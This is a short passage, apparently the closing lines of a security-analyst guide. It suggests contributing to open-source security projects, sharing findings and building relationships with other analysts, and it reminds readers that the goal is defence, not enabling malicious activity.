  • Contribute to open-source security projects
  • Share findings with the security community
  • Build relationships with other analysts

Remember: The goal is always to improve defenses and protect systems, not to enable malicious activities.